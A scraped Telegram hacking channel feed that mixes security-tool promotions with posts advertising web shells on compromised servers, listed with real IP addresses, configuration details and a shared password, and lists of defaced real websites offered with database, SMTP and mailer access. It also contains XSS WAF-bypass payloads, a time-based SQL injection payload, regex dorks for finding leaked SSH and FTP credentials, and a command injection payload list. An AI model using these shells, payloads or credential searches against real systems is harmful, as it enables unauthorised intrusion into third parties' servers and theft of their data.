BugCod3
7.27K subscribers
334 photos
6 videos
7 files
445 links
[ BugCod3 ] โ€” From Shadows To Shells โšก๏ธ

๐Ÿ•ถ Hacking | ๐Ÿž Bug Bounty | ๐Ÿ” Security Tools
โš”๏ธ Learn โ€ข Hunt โ€ข Dominate

๐Ÿ‘ฅ Group: T.me/BugCod3GP
๐Ÿ“‚ Topic: T.me/BugCod3Topic

๐ŸŒ Web: BugCod3.com
๐Ÿค– Contact: T.me/BugCod3BOT
๐Ÿ“ง Email: BugCod3@protonmail.com
Download Telegram
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
7โšก1โค1
๐Ÿ”‘ LEAKEY ๐Ÿ”‘

LEAKEY is a bash script which checks and validates for leaked credentials. The idea behind LEAKEY is to make it highly customizable and easy to add checks for new services.

๐Ÿ’ฌ
LEAKEY is a tool is for validation of leaked API tokens/keys found during pentesting and Red Team Enegagments.
The script is really useful for Bug Hunters inorder to validate and determine the impact of leaked credentials.

LEAKEY uses a json based signature file located at ~/.leakey/signatures.json
The idea behind LEAKEY is to make it highly customizable and easy to add new services/checks once they are discovered.

LEAKEY loads the services/check list via the signature file, if you wish to add more Checks/services, simply append it in the signatures.json file

๐Ÿ‘ค Requirements:
โšช๏ธ jq

๐Ÿ”ผ Installation:
curl https://raw.githubusercontent.com/rohsec/LEAKEY/master/install.sh -o leaky_install.sh && chmod +x leaky_install.sh && bash leaky_install.sh


๐Ÿ’ป Usage:
After running the installation command, simply run the below in your terminal
leaky


๐Ÿ“Š Adding Checks:
All the checks for LEAKEY are defined in the signatures.json file.
To add any new checks, simply appened the signatures file at ~/.leakey/signatures.json
{
"id": 0,
"name": "Slack API Token",
"args": [
"token"
],
"command": "curl -sX POST \"https://slack.com/api/auth.test?token=xoxp-$token&pretty=1\""
}


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#RedTeam #BugHunter #Leaked #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘4โค22โšก1
๐Ÿ•ธ Site
๐Ÿ‘โ€๐Ÿ—จ Mirror-h

Country: ๐Ÿ‡บ๐Ÿ‡ธ

#Deface
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โค4โšก1๐Ÿ”ฅ1
PHP: 7.0.33

Safe Mode: OFF

ServerIP: 208.109.13.219 [๐Ÿ‡ธ๐Ÿ‡ฌ]

HDD: Total:149.99 GB
Free:28.53 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gzip nc

Downloader: wgetl ynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

๐Ÿ”— Link
pwd: bugcod3

Enjoy... โญ๏ธ

#Shell
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก1โคโ€๐Ÿ”ฅ1๐Ÿ”ฅ1
Please open Telegram to view this post
VIEW IN TELEGRAM
โคโ€๐Ÿ”ฅ2โšก1๐Ÿ”ฅ1
PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [๐Ÿ‡บ๐Ÿ‡ธ]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

๐Ÿ”— Link

Enjoy... โญ๏ธ

#Shell
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก1โคโ€๐Ÿ”ฅ1๐Ÿ”ฅ1๐Ÿ˜ข1
๐Ÿ•ธ Site:
https://appie.ru/index.html
http://skupix.su/index.html
https://skupka-spb.ru/index.html
http://skypka.tv/index.html

๐Ÿ‘โ€๐Ÿ—จ Mirror-h

๐Ÿ“Š Database

Country: ๐Ÿ‡ท๐Ÿ‡บ

#Deface
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3๐Ÿ‘Ž2โšก1โค1
Bypass Cloudflare WAF (XSS without parentheses)

javascript:var{a:onerror}={a:alert};throw%20document.domain


#xss #bugbountytips #infosec
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก1โค1๐Ÿ”ฅ1
Akamai WAF (new, requires a click to pop)

<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>


Vector PoC

#XSS #Bypass
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก1โค1๐Ÿ”ฅ1
๐Ÿฑ SiCat ๐Ÿฑ

The useful exploit finder

๐Ÿ’ฌ
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

๐Ÿ”ผ Installation:
pip  install  -r  requirements.txt


๐Ÿ’ป Usage:
python sicat.py --help


๐Ÿ“‚ Example:
From keyword:
python sicat -k telerik --exploitdb --msfmodule

From nmap output:
nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Exploit #Metasploit #Finder
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค1๐Ÿ‘1๐Ÿ”ฅ1๐Ÿณ1
๐Ÿ”ฅNew Triaged report Sql Injection ๐Ÿ˜ > Payload used time-based poc.

,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW


MySQL

#bugbountytip #infosec
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2๐Ÿ‘Ž2โšก1๐Ÿ”ฅ1
๐Ÿ•ธ Site:
http://kk-qq.work/index.html
https://comls.co.jp/BugCod3.html
http://comls.jp/BugCod3.html
http://hagakure.pro/index.html
http://tanpopo12.work/index.html
http://lanciaconstructora.com/

๐Ÿ‘โ€๐Ÿ—จ Mirror-h

Country: ๐Ÿ‡ฏ๐Ÿ‡ต๐Ÿ‡บ๐Ÿ‡ธ

#Deface
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿณ2
Free Shell

๐Ÿ”— Link

#Shell
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3โšก1๐Ÿ”ฅ1๐Ÿ˜1๐Ÿณ1
๐Ÿ•ธ Site:
https://apsgevents.com/
https://giftimprint.com/
http://kulibangunan.giftimprint.com/
https://mail.giftimprint.com/
https://redstarfilms.net/
https://mail.redstarfilms.net/
https://tropicanarestaurants.com/
https://mail.tropicanarestaurants.com/

๐Ÿ‘โ€๐Ÿ—จ Mirror-h

๐Ÿ“Š Database

๐Ÿ›ก Smtp

๐Ÿ“ง LeafMailer

๐Ÿ”’ bugcod3

Country: ๐Ÿ‡บ๐Ÿ‡ธ

#Deface
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3๐Ÿ”ฅ2โค1๐Ÿ‘1
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#bugbountytips #bugbounty
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค1๐Ÿ”ฅ1
Command Injection Payload List

โฌ‡๏ธ Download

#Payload #Command #Injection
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค1๐Ÿ”ฅ1
โ˜ ๏ธ xnLinkFinder v4.4 โ˜ ๏ธ

๐Ÿ’ฌ
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

๐Ÿ“Š This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
โšช๏ธ crawling a target (pass a domain/URL)
โšช๏ธ crawling multiple targets (pass a file of domains/URLs)
โšช๏ธ searching files in a given directory (pass a directory name)
โšช๏ธ get them from a Burp project (pass location of a Burp XML file)
โšช๏ธ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
โšช๏ธ get them from a Caido project (pass location of a Caido export CSV file)
โšช๏ธ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

๐Ÿ”ผ Installation:
cd xnLinkFinder
sudo python setup.py install


๐Ÿ’ป Usage:
python xnLinkFinder.py --help


๐Ÿ“‚ Examples:
#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com


๐Ÿ˜ธ Github

โฌ‡๏ธ Donwload
๐Ÿ”’ BugCod3

#Python #Discover #Endpoints
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘3โšก2๐Ÿ”ฅ2โค1
NetProbe: Network Probe

๐Ÿ’ฌ
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

๐Ÿ“Š Features:
โšช๏ธ Scan for devices on a specified IP address or subnet
โšช๏ธ Display the IP address, MAC address, manufacturer, and device model of discovered devices
โšช๏ธ Live tracking of devices (optional)
โšช๏ธ Save scan results to a file (optional)
โšช๏ธ Filter by manufacturer (e.g., 'Apple') (optional)
โšช๏ธ Filter by IP range (e.g., '192.168.1.0/24') (optional)
โšช๏ธ Scan rate in seconds (default: 5) (optional)

๐Ÿ”ผ Installation:
cd NetProbe
pip install -r requirements.txt


๐Ÿ’ป Usage:
python3 netprobe.py โ€”help


๐Ÿ“‚ Example:
python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Network #Scanner #Vulnerability #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4โค3๐Ÿ”ฅ1
PHP: 8.1.27

Safe Mode: OFF

ServerIP: 213.158.95.90 [๐Ÿ‡ฎ๐Ÿ‡น]

HDD: Total:1536.00 GB
Free:1322.97 GB [86%]

useful:--------------

Downloader: --------------

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: nginx/1.22.0

๐Ÿ”— Link

Enjoy... โญ๏ธ

#Shell
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ”ฅ 0Day.Today
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4โค1๐Ÿ‘1๐Ÿ”ฅ1